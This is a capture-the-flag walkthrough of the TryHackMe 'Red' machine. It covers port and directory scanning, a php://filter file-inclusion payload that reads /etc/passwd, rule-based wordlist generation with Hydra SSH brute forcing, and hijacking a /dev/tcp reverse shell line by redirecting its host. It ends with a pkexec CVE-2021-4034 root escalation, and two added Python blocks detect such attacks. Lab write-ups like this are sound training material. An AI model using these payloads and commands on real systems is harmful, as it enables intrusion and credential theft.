THM Red Walkthrough

In this page I’ll detail a walkthrough for the Easy machine Red from TryHackMe.

As usual, once the machine started I began with an nmap scan.

└──╼ $sudo nmap -sS -sC -sV -p- 10.10.23.96 --open
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 12:19 EDT
Nmap scan report for 10.10.23.96
Host is up (0.092s latency).
Not shown: 65495 closed tcp ports (reset), 38 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2741ce0f7864d6946f65b4dbec39f76 (RSA)
| 256 fb8473da6cfeb9195a6c654dd1723bb0 (ECDSA)
|_ 256 5e3775fcb364e2d8d6bc9ae67e604d3c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Atlanta – Free business bootstrap template
|_Requested resource was /index.php?page=home.html
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.90 seconds

From here we see two open ports: 22 for SSH and 80 for HTTP. With 80 available, I next ran a dirb scan against it.

└──╼ $dirb http://10.10.23.96

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 17 12:21:34 2023
URL_BASE: http://10.10.23.96/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

—- Scanning URL: http://10.10.23.96/ —-
==> DIRECTORY: http://10.10.23.96/assets/
+ http://10.10.23.96/index.php (CODE:302|SIZE:0)
+ http://10.10.23.96/server-status (CODE:403|SIZE:276)

—- Entering directory: http://10.10.23.96/assets/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Jul 17 12:28:14 2023
DOWNLOADED: 4612 - FOUND: 2

Not a whole lot here, so I ran another scan with gobuster.

└──╼ $gobuster dir -u http://10.10.23.96 -x html,xml,jsp,txt,asp,bak,php -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.23.96
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,asp,bak,php,html,xml,jsp
[+] Timeout: 10s
===============================================================
2023/07/17 12:29:07 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt (Status: 403) [Size: 276]
/.htpasswd.xml (Status: 403) [Size: 276]
/.htpasswd.jsp (Status: 403) [Size: 276]
/.htaccess.asp (Status: 403) [Size: 276]
/.htpasswd.txt (Status: 403) [Size: 276]
/.htaccess.bak (Status: 403) [Size: 276]
/.htpasswd.asp (Status: 403) [Size: 276]
/.htaccess.php (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd.bak (Status: 403) [Size: 276]
/.htaccess.html (Status: 403) [Size: 276]
/.htpasswd.php (Status: 403) [Size: 276]
/.htaccess.xml (Status: 403) [Size: 276]
/.htpasswd.html (Status: 403) [Size: 276]
/.htaccess.jsp (Status: 403) [Size: 276]
/about.html (Status: 200) [Size: 9309]
/assets (Status: 301) [Size: 311] [--> http://10.10.23.96/assets/]
/contact.html (Status: 200) [Size: 7507]
/home.html (Status: 200) [Size: 15757]
/index.php (Status: 302) [Size: 0] [--> /index.php?page=home.html]
/portfolio.html (Status: 200) [Size: 14352]
/readme.txt (Status: 200) [Size: 675]
/server-status (Status: 403) [Size: 276]
/services.html (Status: 200) [Size: 9131]
/signin.html (Status: 200) [Size: 6655]
/signup.html (Status: 200) [Size: 7283]

===============================================================
2023/07/17 12:52:40 Finished
===============================================================

What immediately stuck out is that index.php redirects to another local page, home.html, through a page parameter. That made me think of an LFI vulnerability right away. However, pointing it directly at /etc/passwd, for example, didn't work. Instead, I was able to read local files through a php:// filter wrapper, as shown below.

curl http://10.10.126.75/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

This returns the passwd file in base64 format. Once that’s decoded, I have the full /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
blue:x:1000:1000:blue:/home/blue:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
red:x:1001:1001::/home/red:/bin/bash
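As an added, defender-side example that is not part of the original walkthrough: a small Python scanner that runs over constructed Apache access-log lines and flags index.php?page= values carrying a PHP stream wrapper, path traversal or an absolute path, and checks everything else against the page list gobuster found above, which is the allow-list check a fixed index.php should perform instead of including whatever it is handed. The log lines, client IP and sizes are invented for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines for this example; the client IP,
# timestamps and sizes are invented and do not come from the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2023:12:30:01 -0400] "GET /index.php?page=home.html HTTP/1.1" 200 15757 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Jul/2023:12:31:12 -0400] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 0 "-" "curl/7.88.1"
10.0.0.5 - - [17/Jul/2023:12:31:40 -0400] "GET /index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2500 "-" "curl/7.88.1"
10.0.0.5 - - [17/Jul/2023:12:32:05 -0400] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0 "-" "curl/7.88.1"
10.0.0.5 - - [17/Jul/2023:12:32:30 -0400] "GET /index.php?page=PHP%3A%2F%2Ffilter%2Fresource%3Dindex.php HTTP/1.1" 200 900 "-" "curl/7.88.1"
10.0.0.5 - - [17/Jul/2023:12:33:00 -0400] "GET /about.html HTTP/1.1" 200 9309 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Stream wrappers PHP's include() accepts; a real page name never starts with one.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|file|ftp|https?|glob|compress\.\w+)://", re.I)
# The pages this site actually serves (from the gobuster results): the
# allow-list a fixed index.php should check the parameter against.
ALLOWED_PAGES = {"home.html", "about.html", "services.html", "portfolio.html",
                 "contact.html", "signin.html", "signup.html"}

def classify_page_value(value):
    """Return None for a benign page value, otherwise a short reason it is not."""
    decoded = unquote(value)          # parse_qs decoded once; catch double-encoding too
    if WRAPPER_RE.match(decoded):
        return "stream wrapper: " + decoded.split("://", 1)[0].lower()
    if ".." in decoded.split("/"):
        return "path traversal"
    if decoded.startswith("/") or "\x00" in decoded:
        return "absolute path or null byte"
    if decoded not in ALLOWED_PAGES:
        return "not on page allow-list"
    return None

def scan_access_log(text):
    """Return (line_number, page_value, reason) for each suspicious include."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in query.get("page", []):
            reason = classify_page_value(value)
            if reason:
                hits.append((n, value, reason))
    return hits
```

Running scan_access_log(SAMPLE_LOG) flags lines 2 to 5 and leaves the two ordinary requests alone; the same classify_page_value check, applied before the include, is the server-side fix.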

The big takeaway from /etc/passwd is that there are two users, red and blue. After poking around for other files, I came across this in /home/blue/.bash_history:

echo "Red rules"
cd
hashcat --stdout .reminder -r /usr/share/hashcat/rules/best64.rule > passlist.txt
cat passlist.txt
rm passlist.txt
sudo apt-get remove hashcat -y

Included here is a command that generates a password list from a hidden .reminder file. Now that I know it exists, I can read that file the same way, and its contents are a password. I can then replicate the command above to generate my own password list, which can be used with Hydra to brute-force blue's SSH password.

hydra -l blue -P passlist.txt ssh://10.10.79.222

This may need to be done more than once: along with taunting you, red kicks you out and changes the password after a while.

Once in, I wasn’t able to find anything until I ran ps -aux | grep red and saw the below:

red 15083 0.0 0.1 6972 2688 ? S 00:18 0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
red 15431 0.0 0.1 6972 2488 ? S 00:19 0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &

From this I can see that red is sending a reverse shell to redrules.thm on port 9001. I just have to point redrules.thm at my machine, where I have a netcat listener, by editing the /etc/hosts file.

echo '<MY IP> redrules.thm' >> /etc/hosts

Once done, I wait for a few minutes and have a shell as red, which I promptly upgrade.

python3 -c 'import pty;pty.spawn("/bin/bash")'

For escalation to root I wasn't finding anything, except for a hidden .git folder in red's home that contained only an old version of pkexec. As it turns out, that version is vulnerable to CVE-2021-4034.

I found a Python script on GitHub to exploit this; all I had to do was change the path in it to point at this copy of pkexec. Once I transferred it to the machine and ran it, a root shell popped up immediately!
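An added example, not from the walkthrough: CVE-2021-4034 only works against a pkexec that is setuid root, so from the defender's side the thing to hunt is a setuid-root file sitting outside the package-managed directories, which is exactly where a forgotten copy like the one in red's .git folder would surface. The directory list is an assumption for Ubuntu, and the file name used in the comment is a placeholder (the walkthrough names the folder, not the file).

```python
import os
import stat

# Directories where setuid-root binaries normally live on Ubuntu (assumed
# list). A setuid-root file anywhere else, e.g. a stray /home/red/.git/pkexec
# (placeholder name), is what this audit is for.
EXPECTED_DIRS = ("/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec",
                 "/bin", "/sbin", "/snap")

def is_stray_setuid(path, mode, uid, owner_uid=0):
    """True when (mode, uid) describe a regular setuid file owned by owner_uid
    that sits outside EXPECTED_DIRS. mode is a full st_mode value."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID or uid != owner_uid:
        return False
    return not any(path.startswith(d + "/") for d in EXPECTED_DIRS)

def find_stray_setuid(roots, owner_uid=0):
    """Walk roots (e.g. ["/home", "/tmp", "/opt"]) and return stray setuid
    files with their permission bits, so the fix (chmod u-s) is obvious."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)     # lstat: do not follow symlinks
                except OSError:
                    continue                # unreadable or vanished; skip it
                if is_stray_setuid(path, st.st_mode, st.st_uid, owner_uid):
                    found.append((path, oct(stat.S_IMODE(st.st_mode))))
    return found

if __name__ == "__main__":
    for path, perms in find_stray_setuid(["/home", "/tmp", "/opt"]):
        print(f"{perms} {path}")
```

The vendor mitigation for CVE-2021-4034 where patching was not possible was to strip the setuid bit from pkexec (chmod 0755), and the same chmod u-s neutralises a stray copy this audit turns up.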